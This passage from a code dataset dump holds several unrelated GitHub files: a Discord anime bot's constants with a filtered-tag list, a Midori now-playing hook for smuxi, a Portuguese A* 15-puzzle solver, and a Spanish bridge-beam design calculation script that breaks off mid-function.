However, you can still use the bot albeit limited.\n\nAllowed commands:\n- `/profile myanimelist mal_username:`\n- `/profile anilist anilist_username:`\n- `/profile shikimori shikimori_username:`\n- `/profile lastfm lastfm_username:`\n\nIf you want to register, please use the command `/register` again and accept the consent by set the `accept_privacy_policy` option to `true`!\n\nWe only store your MAL username, MAL UID, Discord username, Discord UID, and joined date for both platforms, also server ID during registration.\nWe do not store any other data such as your email, password, or any other personal information.\nWe also do not share your data with any third party than necessary, and it only limited to the required platforms such Username.\n\n***We respect your privacy.***\n\nFor more info what do we collect and use, use `/privacy`.\n\"\"\"\n\"\"\"The declined GDPR notice, deprecated in favor of i18n\"\"\"\n\n# =============================================================================\n\n# Common errors and messages\n\nMESSAGE_INVITE: Final[\n str\n] = 'To invite me, simply press \"**Invite me!**\" button below!\\nFor any questions, please join my support server!'\n\"\"\"The invite message\"\"\"\n\nMESSAGE_WARN_CONTENTS: Final[\n str\n] = \"\"\"\n\nIf you invoked this command outside (public or private) forum thread channel or regular text channel and **Age Restriction** is enabled, please contact developer of this bot as the feature only tested in forum thread and text channel.\n\nYou can simply access it on `/support`\"\"\"\n\"\"\"The message when a user invoked a command outside forum thread channel or regular text channel\"\"\"\n\nBANNED_TAGS = [\n \"Amputation\",\n \"Anal Sex\",\n \"Ashikoki\",\n \"Asphyxiation\",\n \"Blackmail\",\n \"Bondage\",\n \"Boobjob\",\n \"Cumflation\",\n \"Cunnilingus\",\n \"Deepthroat\",\n \"DILF\",\n \"Fellatio\",\n \"Femdom\",\n \"Futanari\",\n \"Group Sex\",\n \"Handjob\",\n \"Human Pet\",\n \"Incest\",\n \"Inseki\",\n 
\"Irrumatio\",\n \"Lactation\",\n \"Masochism\",\n \"Masturbation\",\n \"MILF\",\n \"Nakadashi\",\n \"Pregnant\",\n \"Prostitution\",\n \"Public Sex\",\n \"Rape\",\n \"Rimjob\",\n \"Sadism\",\n \"Scat\",\n \"Scissoring\",\n \"Sex Toys\",\n \"Squirting\",\n \"Sumata\",\n \"Sweat\",\n \"Tentacles\",\n \"Threesome\",\n \"Vore\",\n \"Voyeur\",\n \"Watersports\",\n \"Omegaverse\",\n]\n\"\"\"List of tags that should be removed if found on AniList result\"\"\"\n\nTRAKT_HEADER = {\n \"Content-Type\": \"applications/json\",\n \"trakt-api-key\": TRAKT_CLIENT_ID,\n \"trakt-api-version\": f\"{TRAKT_API_VERSION}\",\n}\n\"\"\"Default Trakt API header\"\"\"\n","repo_name":"nattadasu/ryuuRyuusei","sub_path":"modules/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"15986888493","text":"import sys\n\ntry:\n import dbus\nexcept ImportError:\n print (u\"ProtocolManager.Command /echo you need to install python-dbus\")\n raise SystemExit(1)\n\nclass Midori(object):\n\n def __init__(self):\n\n session_bus = dbus.SessionBus()\n try:\n player = session_bus.get_object('org.midori.mediaHerald','/org/midori/mediaHerald')\n self.__iface = dbus.Interface(player, dbus_interface='org.freedesktop.DBus.Properties')\n self.__get_iface = True\n except dbus.exceptions.DBusException:\n print (u\"ProtocolManager.Command /echo you need to run midori extension 'Webmedia now-playing'\")\n self.__get_iface = False\n \n\n @classmethod\n def GetTrackInfos(cls):\n midori = Midori()\n if midori.__get_iface:\n properties = midori.__iface.GetAll('org.midori.mediaHerald')\n output = properties.get(\"VideoTitle\")[1:] + ' - '+ properties.get(\"VideoUri\")[0:]\n print(u\"ProtocolManager.Command /me is playing: {}\".format(output).encode(\"utf-8\"))\n return True\n return 
False\n","repo_name":"meebey/smuxi-hooks","sub_path":"now-playing/frontend/command-manager/command-np/engine/midori.py","file_name":"midori.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"40693849859","text":"import heapq\n\n## BLOCO CLASSE DO ESTADO E VARIÁVEIS ##\nclass Estado(object):\n matriz = []\n g = 0\n h = 0\n p = None\n identificador = 0\n\n def __lt__(self, other):\n return self.f() < other.f()\n \n def f(self):\n return self.g + self.h\n\nA = [Estado()]\nmatrizEntrada = []\nmatrizFinal = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 0]\ndicionarioAbertos = {}\ndicionarioFechados = {}\n\n## BLOCO HEURISTÍCAS ##\ndef h1(estado): #Heurística 1\n qtPecasForaDoLugar = 0\n for i in range(16):\n if (estado.matriz[i] != matrizFinal[i]):\n qtPecasForaDoLugar = qtPecasForaDoLugar +1\n \n estado.h = qtPecasForaDoLugar\n\ndef h2(estado): #Heurística 2\n qntdPecasForaSeq = 0\n #vetorPosicoes = [4, 8, 12, 13, 14, 11, 7, 3, 2, 1, 5, 9, 10, 6]\\\n vetorPosicoes = [4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 2, 7, 11]\n\n #mas oque é isso deputado ?\n\n for i in vetorPosicoes:\n if ((estado.matriz[i] +1) != estado.matriz[i +1]):\n qntdPecasForaSeq = qntdPecasForaSeq +1\n\n estado.h = qntdPecasForaSeq\n\ndef h3(estado): #Heurística 3\n matrizMap = [(0,0), (0,1), (0,2), (0,3),\n (1,0), (1,1), (1,2), (1,3),\n (2,0), (2,1), (2,2), (2,3),\n (3,0), (3,1), (3,2), (3,3)]\n vetorPerfeito = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 0]\n \n distRetangular = 0\n for i in range(16):\n if (estado.matriz[i] != vetorPerfeito[i]):\n posicaoCorreta = vetorPerfeito.index(estado.matriz[i])\n distRetangular = distRetangular + calculadistRetangular(matrizMap[i], matrizMap[posicaoCorreta])\n\n estado.h = distRetangular \n\ndef calculadistRetangular(elementoA, elementoB):\n return (abs(elementoA[0] - elementoB[0]) + abs(elementoA[1] - elementoB[1]))\n''''\ndef h4(estado): 
#Heurística 4\n h1(estado)\n resultadoH1 = estado.h\n\n h2(estado)\n resultadoH2 = estado.h\n\n h3(estado)\n resultadoH3 = estado.h\n\n p1 = 0.1\n p2 = 0\n p3 = 0.9\n\n estado.h = ((p1 * resultadoH1) + (p2 * resultadoH2) + (p3 * resultadoH3)) \n\ndef h5(estado): #Heurística 5\n h1(estado)\n resultadoH1 = estado.h\n\n h2(estado)\n resultadoH2 = estado.h\n\n h3(estado)\n resultadoH3 = estado.h\n\n estado.h = max(resultadoH1, resultadoH2, resultadoH3)\n'''\n## BLOCO FUNÇÕES AUXILIARES ##\ndef r(estadoPai): \n pos_zero = estadoPai.matriz.index(0)\n\n if ((pos_zero -4) >= 0): #Rotacao de Cima para Baixo\n rotacionaEstado(estadoPai, pos_zero, -4)\n \n if ((pos_zero +4) <= 15): #Rotacao de Baixo para Cima\n rotacionaEstado(estadoPai, pos_zero, +4)\n\n modPos = (pos_zero%4)\n if (modPos > 0): #Rotacao da Esquerda para Direita\n rotacionaEstado(estadoPai, pos_zero, -1)\n\n if (modPos < 3): #Rotacao da Direita para Esquerda\n rotacionaEstado(estadoPai, pos_zero, +1)\n\ndef rotacionaEstado(estadoOriginal, pos_zero, deslocamento):\n rotacao = estadoOriginal.matriz[:] #Copia a Matriz\n posTroca = (pos_zero + deslocamento)\n rotacao[pos_zero], rotacao[posTroca] = rotacao[posTroca], rotacao[pos_zero] #Troca os elementos\n\n idMatrizRotacao = calculaHash(rotacao)\n estadoExistente = obterEstado(dicionarioAbertos, idMatrizRotacao)\n posGPai = (estadoOriginal.g +1)\n if (estadoExistente != -1):\n if (estadoExistente.g > posGPai):\n estadoExistente.p = estadoOriginal\n estadoExistente.g = posGPai\n adicionaEstadoNoHeap(estadoExistente)\n else:\n estado = Estado()\n estado.matriz = rotacao\n estado.p = estadoOriginal\n estado.g = posGPai\n estado.identificador = idMatrizRotacao\n\n if (obterEstado(dicionarioFechados, idMatrizRotacao) == -1):\n h2(estado) #Calcula a heurística\n adicionaNoDicionario(dicionarioAbertos, estado)\n adicionaEstadoNoHeap(estado)\n\ndef adicionaEstadoNoHeap(estado):\n heapq.heappush(A, estado)\n\ndef menorEstadoAberto():\n return heapq.heappop(A)\n\ndef 
calculaHash(matrizEstado):\n return tuple(matrizEstado)\n\ndef adicionaNoDicionario(dicionario, estado):\n dicionario[estado.identificador] = estado\n\ndef removeDoDicionario(dicionario, estado):\n try:\n del dicionario[estado.identificador]\n except:\n pass\n\ndef obterEstado(dicionario, identificador):\n try:\n return dicionario[identificador]\n except:\n return -1\n\n## BLOCO ALGORITMO A* ##\nvalores = input()\nfor x in valores.split():\n matrizEntrada.append(int(x))\n\nA[0].matriz = matrizEntrada\nA[0].identificador = calculaHash(matrizEntrada)\nadicionaEstadoNoHeap(A[0])\nidMatrizFinal = calculaHash(matrizFinal)\n\nwhile True:\n\n v = menorEstadoAberto()\n if (v.identificador == idMatrizFinal):\n break\n\n removeDoDicionario(dicionarioAbertos, v) \n adicionaNoDicionario(dicionarioFechados, v)\n\n r(v) #Calcula os sucessores\n\nprint(v.g)\n","repo_name":"vhpavoni/MOA","sub_path":"AgotimoAestrela.py","file_name":"AgotimoAestrela.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9812313609","text":"from numpy.lib.shape_base import vsplit\nimport makepath\n\nfrom pyFEM import Structure\nfrom docxtpl import DocxTemplate\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pprint\n\npp = pprint.PrettyPrinter(sort_dicts=False)\n\ncamion_CC14 = {\n 'separacion_ejes': [4.3, 4.3],\n 'peso_ejes': [40, 160, 160],\n 'carga_carril': 10.3,\n 'separacion_ruedas': 1.8,\n 'separacion_borde': 0.6\n}\n\ntandem_CC14 = {\n 'separacion_ejes': [1.2],\n 'peso_ejes': [125, 125],\n}\n\n# tabla 3.6.1.1.2-1 -- Factores de presencia múltiple, m\nfactor_presencia_multiple = {1: 1.2, 2: 1}\n\n\ndef superestructura(params={}):\n # losa: losa\n # carpetaAsfaltica: carpeta asfaltica\n # Nb: cantidad de vigas, -\n # vigas: vigas de la superestructura\n # S: separación entre vigas, m\n # S_overhang: voladizo, m\n # L: longitud de la superestructura, m\n\n # svigas = 2\n # bf = 
'bf'\n # elosa = \n # pesoconcreto = \n\n nb = params['nb'] = params.get('nb', 4) # numero de vigas \n nl = params['nl'] = params.get('nl', 2) # numero de carriles cargados\n fy = params['fy'] = params.get('fy', 420000) # acero en kPa\n fc = params['fc'] = params.get('fc', 28000) # concreto en kPa\n Es = params['Es'] = params.get('Es', 200000000) # modulo de elasticidad del acero en kPa \n tiposeccion = params['tiposeccion'] = params.get('tiposeccion', 'e') # tipo de seccion del puente\n frf = params['frf'] = params.get('frf', 0.9) # factor de resistencia por flexion y cortante\n factormodcarga = params['factormodcarga'] = params.get('factormodcarga', 1) # factor de modificacion de carga\n L = params['L'] = params.get('L', 14) # Longitud de la luz\n aapoyo = params['aapoyo'] = params.get('aapoyo', 0.4) # ancho del apoyo\n svigas = params['svigas'] = params.get('svigas', 2) # Separacion entre vigas\n distvoladizo = params['distvoladizo'] = params.get('distvoladizo', 1) # distancia del voladizo desde el centro de la viga\n baseviga = params['baseviga'] = params.get('baseviga', 0.4) # base de la viga\n hviga = params['hviga'] = params.get('hviga', 0.8) # altura de la viga\n elosa = params['elosa'] = params.get('elosa', 0.2) # espesor de la losa\n pesoconcreto = params['pesoconcreto'] = params.get('pesoconcreto', 24) # peso especifico del concreto\n pesoasfalto = params['pesoasfalto'] = params.get('pesoasfalto', 21.57) # peso especifico del asfalto\n pesobaranda = params['pesobaranda'] = params.get('pesobaranda', 0.6865) # peso especifico de la baranda\n nbarandas = params['nbarandas'] = params.get('nbarandas', 2) # numero de barandas\n nbordillo = params['nbordillo'] = params.get('nbordillo', 2) # numero de bordillos\n seccionbordillo1 = params['seccionbordillo1'] = params.get('seccionbordillo1', 0.2) # ancho base bordillo\n seccionbordillo2 = params['seccionbordillo2'] = params.get('seccionbordillo2', 0.2) # ancho corona bordillo\n seccionbordillo3 = 
params['seccionbordillo3'] = params.get('seccionbordillo3', 0.3) # alto bordillo\n ecarpetaasf = params['ecarpetaasf'] = params.get('ecarpetaasf', 0.08) # espesor carperta asfaltica\n \n IM = params['IM'] = params.get('IM', 1.33) # factor de amplificacion dinamica de carga\n n = params['n'] = params.get('n', 1) # Relacion modular\n b1 = params['b1'] = params.get('b1', 2.2) # Distancia para el calculo del factor de distribucion regla de la palanca\n b2 = params['b2'] = params.get('b2', 0.4) # Distancia para el calculo del factor de distribucion regla de la palanca\n rec = params['rec'] = params.get('rec', 0.1) # recubrimiento del acero\n rbarra = params['rbarra'] = params.get('rbarra', 8) # referencia de la barra para flexion\n rbarras = params['rbarras'] = params.get('rbarras', 3) # referencia de la barra para superficie\n rbarrae = params['rbarrae'] = params.get('rbarrae', 4) # referencia de la barra para estribos\n abarra = params['abarra'] = params.get('abarra', 0.000510) # area de la barra en metros para flexion\n abarras = params['abarras'] = params.get('abarras', 0.000071) # area de la barra en metros para superficie\n abarrae = params['abarrae'] = params.get('abarrae', 0.000129) # area de la barra en metros para estribos\n pb1 = params['pb1'] = params.get('pb1', 0.85) # valor para el calculo dela profundidad del bloque de compresiones\n duc = params['duc'] = params.get('duc', 0.003) # deformacion unitaria del concreto\n duas = params['duas'] = params.get('duas', 0.005) # deformacion unitaria del acero supuesta\n y3 = params['y3'] = params.get('y3', 0.75) # valor del concreto para el momento requerido por la combinacion de carga\n y1 = params['y1'] = params.get('y1', 1.6) # valor del concreto para el momento requerido por la combinacion de carga\n alpha = params['alpha'] = params.get('alpha', 90) # angulo para estribos verticales\n \n Ec = params['Ec'] = 4800 * (fc / 1000) ** 0.5 #Modulo de elasticidad del concreto en MPa\n hmin = params['hmin'] = 0.07*L # 
altura minima\n hseccion = params['hseccion'] = hviga + elosa # altura de la seccion compuesta\n bf = params['bf'] = (svigas/2) + distvoladizo # ancho efectico de la aleta\n DClosa = params['DClosa'] = bf*elosa*pesoconcreto # carga de la losa\n DCviga = params['DCviga'] = baseviga*hviga*pesoconcreto # carga de la viga\n DCest = params['DCest'] = DClosa + DCviga # carga de la estructura\n DCbaranda = params['DCbaranda'] = (pesobaranda*nbarandas)/nb # carga de la baranda\n DCbordillo = params['DCbordillo'] = ((((seccionbordillo1+seccionbordillo2)/2)*seccionbordillo3)*pesoconcreto*nbordillo)/nb # carga del bordillo\n DCper = params['DCper'] = DClosa + DCviga + DCbordillo + DCbaranda # carga DC\n DW = params['DW'] = ecarpetaasf*bf*pesoasfalto # carga del asfalto \n MDCest = params['MDCest'] = (DCest*(L**2))/8 # Momento maximo estructura\n MDW = params['MDW'] = (DW*(L**2))/8 # Momento maximo del asfalto\n MDCvol = params['MDCvol'] = ((DCbordillo + DCbaranda)*(L**2))/8 # Momento maximo del voladizo\n MDCper = params['MDCper'] = MDCest + MDCvol # Momento maximo carga DC\n VDCest = params['VDCest'] = (DCest*L)/2\n VDCvol = params['VDCvol'] = ((DCbordillo + DCbaranda)*L)/2\n VDCper = params['VDCper'] = VDCest + VDCvol\n\n A = params['A'] = baseviga*hviga # Area de la viga seccion simple\n y = params['y'] = hviga/2 # centroide la viga seccion simple\n Al = params['Al'] = bf*elosa # Area de la losa seccion simple\n yl = params['yl'] = elosa/2 # centroide la losa seccion simple\n Ac = params['Ac'] = A + Al # Area de la seccion compuesta\n yc = params['yc'] = ((A*y)+(Al*(yl+hviga)))/Ac # centroide la seccion compuesta\n I = params['I'] = (baseviga*(hviga**3))/12 # inercia de la viga sección simple\n Il = params['Il'] = (bf*(elosa**3))/12 # inercia de la losa sección simple\n Ic = params['Ic'] = (I +(A*((yc-y)**2))) + (Il +(Al*(((yl+hviga)-yc)**2))) # inercia de la sección compuesta\n Snc = params['Snc'] = I/y # modulo de la seccion simple\n Sc = params['Sc'] = Ic/yc # modulo de 
la seccion compuesta\n \n de = params['de'] = distvoladizo - seccionbordillo1 # distancia entre eje de la viga exterior y la cara interna de la bordillo\n eg = params['eg'] = hseccion-(elosa/2)-(hviga/2) # distancia entre centroides de la viga y la losa\n kg = params['kg'] = n*(I + (A*(eg**2))) # Parametro para el calculo del factor de distribucion\n mg1i = params['mg1i'] = 0.06 + ((svigas/4.3)**0.4)*((svigas/L)**0.3)*((kg/(L*elosa**3))**0.1) # factor de distribucion para momento\n mg2i = params['mg2i'] = 0.075 + ((svigas/2.9)**0.6)*((svigas/L)**0.2)*((kg/(L*elosa**3))**0.1) # factor de distribucion para momento\n g1e = params['g1e'] = (b1 + b2)/(2*svigas) # factor de distribucion sin mayorar por el factor de presencia multiple\n mg1e = params['mg1e'] = 1.2*g1e # factor de distribucion para momento\n mg2e = params['mg2e'] = (0.77 + (de/2.80))*mg2i # factor de distribucion para momento\n \n mg1ic = params['mg1ic'] = 0.36 + (svigas/7.6) # factor d7e distribucion para cortante\n mg2ic = params['mg2ic'] = 0.2 + (svigas/3.6)-((svigas/10)**2) # factor de distribucion para cortante\n mg1ec = params['mg1ec'] = 1.2*g1e # factor de distribucion para cortante\n mg2ec = params['mg2ec'] = (0.60 + (de/3))*mg2ic # factor de distribucion para cortante\n \n model = create_model(params)\n\n momentos_flectores_cargas_estructura(params, model)\n fuerzas_internas_cargas_permanentes(params, model)\n momentos_flectores_carga_viva_vehicular(params, model)\n combinaciones_carga(params, model)\n combinaciones_cargav(params, model)\n\n MLv = params['MLv'] = params['MLVmax'] # momento generado por el vehiculo\n MLc = params['MLc'] = params['MLCmax'] # momento generado por el carril\n \n MLLIM = params['MLLIM'] = (IM*MLv) + MLc # Momento maximo carga viva vehicular\n\n\n MLLIMp = params['MLLIMp'] = MLLIM*min(max(mg1i,mg2i),max(mg2e,mg1e)) # momento maximo debido a la carga viva con el factor de distribucion maximo hallado\n MUI = params['MUI'] = 
factormodcarga*((1.25*MDCper)+(1.5*MDW)+(1.75*MLLIMp)) # momento ultimo para resistencia I\n \n nbarra = params['nbarra'] = params.get('nbarra', 2)\n Sbarra = params['Sbarra'] = params.get('Sbarra', 0.25)\n\n As = params['As'] = nbarra*abarra\n rece = params['rece'] = rec + 0.03\n d = params['d'] = hseccion - rece # altura efectiva\n p = params['p'] = As/(baseviga*d)\n a = params['a'] = (p*d*fy)/(0.85*fc) # posicion del eje neutro\n Mn = params['Mn'] = frf*As*fy*(d - (a/2))\n \n d2 = params['d2'] = d - Sbarra\n p2 = params['p2'] = As/(baseviga*d2)\n a2 = params['a2'] = (p2*d2*fy)/(0.85*fc) # posicion del eje neutro\n Mn2 = params['Mn2'] = frf*As*fy*(d2 - (a2/2))\n \n d3 = params['d3'] = d2 - Sbarra\n p3 = params['p3'] = As/(baseviga*d3)\n a3 = params['a3'] = (p3*d3*fy)/(0.85*fc) # posicion del eje neutro\n Mn3 = params['Mn3'] = frf*As*fy*(d3 - (a3/2))\n \n d4 = params['d4'] = d3 - Sbarra\n p4 = params['p4'] = As/(baseviga*d4)\n a4 = params['a4'] = (p4*d4*fy)/(0.85*fc) # posicion del eje neutro\n Mn4 = params['Mn4'] = frf*As*fy*(d4 - (a4/2))\n \n \n\n \n k = params['k'] = MUI/(bf*(d**2)) # parametro K para la cuantia\n m = params['m'] = fy/(0.85*fc) # parametro m para la cuantia\n \n # p = params['p'] = (1/m)*(1-(1-((2*m*k)/(frf*fy)))**0.5) # cuantia\n \n # As = params['As'] = p*d*bf # acero de refuerzo\n \n # nbarra = params['nbarra'] = np.ceil(As/abarra) # numero de barras a usar\n \n \n pc = params['pc'] = (As*fy)/(0.85*fc*bf*pb1) # profundidad del bloque de compresiones\n dua = params['dua'] = (d-pc)*(duc/pc) # deformacion unitaria del acero\n Ast = params['Ast'] = nbarra*abarra # area de acero total\n Askmin = params['Askmin'] = ((d*1000) - 760) # area del acero de superficie minimo\n Askmax = params['Askmax'] = ((Ast*1000000)/4) # area del acero de superficie maximo\n Ssup = params['Ssup'] = d/6 # espaciamiento de barras superficiales\n dv1 = params['dv1'] = 0.9*d\n dv2 = params['dv2'] = 0.72*hseccion\n dv = params['dv'] = max(dv1,dv2)\n distc = 
params['distc'] = max(dv1,dv2) + (aapoyo/2)\n\n VDCmax = params['VDCmax'] \n VDW = params['VDW'] = params.get('VDW', 0)\n VLv = params['VLv'] = params['VLVmax']\n VLc = params['VLc'] = params['VLCmax']\n \n MUIdv = params['MUIdv'] = params.get('MUIdv', 625.66) # momento ultimo a cierta distancia del apoyo, debe ser calculado\n nbarradv = params['nbarradv'] = params.get('nbarradv', 4)\n\n VLLIM = params['VLLIM'] = (IM*VLv) + VLc # Cortante maximo carga viva vehicular\n \n\n VLLIMp = params['VLLIMp'] = VLLIM*min(max(mg1ic,mg2ic),max(mg2ec,mg1ec)) \n VUI = params['VUI'] = factormodcarga*((1.25*VDCmax)+(1.5*VDW)+(1.75*VLLIMp)) # cortante ultimo para resistencia I\n VN = params['VN'] = 0.25*fc*baseviga*dv\n vu = params['vu'] = VUI/(frf*baseviga*dv)\n duas = params['duas'] = ((MUIdv/dv)+VUI)/(Es*nbarradv*abarra)\n\n angulo1 = params['angulo1'] = 29 + (3500*duas)\n angulo2 = params['angulo2'] = 4.8/(1 + (750*duas))\n Vc = params['Vc'] = 0.083*angulo2*((fc/1000)**0.5)*baseviga*dv\n Vs = params['Vs'] = (VUI/frf) - (Vc*1000)\n\n pcv = params['pcv'] = (nbarradv*abarra*(fy/1000))/(0.85*(fc/1000)*bf) # profundidad del bloque de compresiones en la seccion critica por cortante\n dvc = params['dvc'] = d - (pcv/2)\n Av = params['Av'] = 2*abarrae\n S = params['S'] = (fy*dvc*Av*((np.cos(angulo1)/np.sin(angulo1))+(np.cos(alpha)/np.sin(alpha)))*np.sin(alpha))/Vs\n Avmin = params['Avmin'] = 0.083*baseviga*0.19*((fc/1000)**0.5)/(fy/1000)\n\n vuc = params['vuc'] = 0.125*fc\n Smax1 = params['Smax1'] = 0.8*dvc\n Smax2 = params['Smax2'] = 0.4*dvc\n \n\n\n\n\n # 'losa': losa(),\n # 'carpetaAsfaltica': carpeta_asfaltica(),\n # 'Nb': 3,\n # 'vigas': viga_i({'L': L}),\n # 'S': 1.69,\n # 'S_overhang': 1.56,\n # 'L': L,\n # 'baseviga': 0.4,\n # 'fy': 420000,\n # 'fc': 28000,\n # 'tipodeseccion': 'e',\n # 'factormodcarga': 1,\n # 'svigas': svigas,\n # 'bf': (svigas / 2 ) * 2,\n # 'hviga': 0.8,\n # 'elosa': 0.2,\n # 'pesoconcreto': 2.4,\n \n # 'DCviga': 0.2,\n # 'DCbordillo': 0.2,\n # 'DCbaranda': 
0.2,\n # 'DW': 0.2,\n # }\n\n # superestructura['']\n # \n # mz = model.internal_forces['DC'][1].mz\n # x = np.linspace(0, L, len(mz))\n # params['MDC'] = [[x, m] for x, m in zip(x, mz)]\n # mz = model.internal_forces['DW'][1].mz\n # x = np.linspace(0, L, len(mz))\n # params['MDW'] = [[x, m] for x, m in zip(x, mz)]\n\n # parametro_rigidez_longitudinal(superestructura)\n\n # factor_distribucion_momentos_viga_interior(superestructura)\n # factor_distribucion_cortante_viga_interior(superestructura)\n # factor_distribucion_momento_viga_exterior(superestructura)\n # factor_distribucion_diseno(superestructura)\n\n # avalúo de cargas\n # avaluo_carga(superestructura)\n\n # momentos flectores\n # cargas permanentes\n # carpeta asfaltica\n # momentos_flectores_carpeta_asfaltica(superestructura, model)\n # momentos_flectores_bordillos_barandas(superestructura, model)\n # carga viva vehicular\n \n\n # combinaciones de carga\n\n return params\n\n\ndef carpeta_asfaltica(params={}):\n # γ: peso específico del asfalto, kN/m3\n # e: espesor de la carpeta asfáltica, m\n\n params['γ'] = 22 # kN/m3\n params['e'] = 0.075\n\n return params\n\ndef losa(params={}):\n # γ: peso especifico, kN/m3\n # f'c : resistencia del concreto, MPa\n # E: módulo de elasticidad, MPa\n \n # ancho: ancho de la losa, m\n # ts: espesor de la losa, m\n # haunch: distancia entre la parte inferior de la losa y la parte superior del alma de las vigas, m\n\n params['γ'] = 24 # kN/m3\n params[\"f'c\"] = 28\n params['E'] = 4800 * params[\"f'c\"] ** 0.5 * 1000\n\n params['ancho'] = 6.5\n params['ts'] = 0.22\n params['haunch'] = 0.05\n\n params['baranda'] = barandas()\n\n return params\n\ndef barandas(params={}):\n # barandas del puente\n\n # bordillo\n\n \n\n params['bordillo'] = bordillo()\n params['peso'] = 3 / 2\n\n return params\n\ndef bordillo(params={}):\n #\n ancho = params['ancho'] = 0.25\n ancho_superior = params['anchoSuperior'] = 0.2\n altura = params['altura'] = 0.3\n peso_especifico = params['γ'] = 
24\n\n params['peso'] = peso_especifico * (ancho + ancho_superior) / 2 * altura\n\n return params\n \n\n\ndef viga_i(params={}):\n # IPE 600\n # L: longitud de la viga, m\n \n # γ: peso unitario, kN/m3\n # fy: resistencia del acero, MPa\n # E: módulo de elasticidad, kPa\n\n # tf: espesor de la aleta, m\n # bf: ancho de la aleta, m\n # tw: espesor del alma, m\n\n # H: altura total de la viga, m\n # D: altura libre del alma, m\n\n # ys: centroíde medido desde la parte superior de la viga, m\n # A: área, m2\n # I: inercia, m4\n\n # Dc: profundidad del alma en compresión en el rango elástico, m\n # Iyc: momento de inercia de la aleta en compresión respecto al eje del alma, m4\n # Iyt: momento de inercia de la aleta en tensión respecto al eje del alma, m4\n\n # peso: peso de la sección transversal de la viga, kN/m\n\n # λrw: relación de esbeltez límite para un alma no compacta, -\n\n L = params['L']\n\n peso_unitario = params['γ'] = 78.5 # kN/m3 \n fy = params['fy'] = 420\n E = params['E'] = 200000000\n\n tf = params['tf'] = 0.019\n bf = params['bf'] = 0.22\n tw = params['tw'] = 0.012\n\n H = params['H'] = 0.6\n D = params['D'] = 0.514\n\n ys = params['ys'] = 0.3\n area = params['A'] = 0.015600\n params['I'] = 0.000921\n\n Dc = params['Dc'] = ys - tf\n Iyc = params['Iyc'] = tf * bf ** 4 / 12\n Iyt = params['Iyt'] = tf * bf ** 4 / 12\n\n params['peso'] = peso_unitario * area\n\n\n λrw = params['λrw'] = 5.7 * (E / fy) ** 0.5\n\n # check\n check = {}\n\n check['0.033L=D/6'] = bf >= D / 6\n check['tf>=1.1tw'] = tf >= 1.1*tw\n check['0.1<=Iyc/Iyt<=10'] = 0.1 <= Iyc / Iyt and Iyc / Iyt <= 10\n check['D/tw<150'] = D / tw < 150\n check['bfc>=L/85'] = bf >= L / 85\n check['2Dc/tw<=λrw'] = 2*Dc / tw <= λrw\n\n params['check'] = check\n\n return params\n\n\ndef parametro_rigidez_longitudinal(superestructura):\n # longitudinal stifness parameter\n losa = superestructura['losa']\n viga = superestructura['vigas']\n\n # calcular el parámetro de rigidez longitudinal\n Kg = {}\n\n n = 
Kg['n'] = viga['E'] / losa['E']\n I = Kg['I'] = viga['I']\n A = Kg['A'] = viga['A']\n eg = Kg['eg'] = losa['ts'] / 2 + (losa['haunch'] - viga['tf']) + viga['ys']\n\n Kg['Kg'] = n * (I + A * eg ** 2)\n\n superestructura['parametroRigidezLongitudinal'] = Kg\n\n return Kg\n\n\ndef factor_distribucion_momentos_viga_interior(superestructura):\n # g_int_moment_1: distribución de la carga viva por linea para momento en vigas interiores, -\n\n factor_distribucion = {}\n losa = superestructura['losa']\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n L = superestructura['L']\n Kg = superestructura['parametroRigidezLongitudinal']['Kg']\n ts = losa['ts']\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n\n check['1.1<=S<=4.9'] = 1.1 < S < 4.9\n check['0.11<=ts<=0.3'] = 0.11 < ts < 0.3\n check['6<=L<=73'] = 6 < L < 73\n check['Nb==3'] = Nb == 3\n check['Nb>=4'] = Nb >= 4\n check['0.0041623<=Kg<=2.9136'] = 0.0041623 <= Kg <= 2.9136\n\n factor_distribucion['check'] = check\n\n if (check['1.1<=S<=4.9'] and\n check['0.11<=ts<=0.3'] and\n check['6<=L<=73'] and\n check['0.0041623<=Kg<=2.9136'] and\n check['Nb==3'] or check['Nb>=4']):\n\n eq = {}\n\n g_int_moment_1 = eq['g_int_moment_1'] = 0.06 + (S / 4.3)**0.4 * (S / L)**0.3 * (Kg / (L * ts ** 3))**0.1\n g_int_moment_2 = eq['g_int_moment_2'] = 0.075 + (S / 2.9)**0.6 * (S / L)**0.2 * (Kg / (L * ts ** 3))**0.1\n eq['g_int_moment'] = max(g_int_moment_1, g_int_moment_2)\n\n factor_distribucion['ecuacion'] = eq\n\n if check['Nb==3']:\n regla_palanca = {}\n\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n \n # un carril cargado\n m = factor_presencia_multiple[1]\n g_int_moment_1 = regla_palanca['g_int_moment_1'] = m * (2*S - separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n g_int_moment_2 = regla_palanca['g_int_moment_2'] = 2 * m * (2*S - 2*separacion_borde - separacion_ruedas) / (2*S)\n\n 
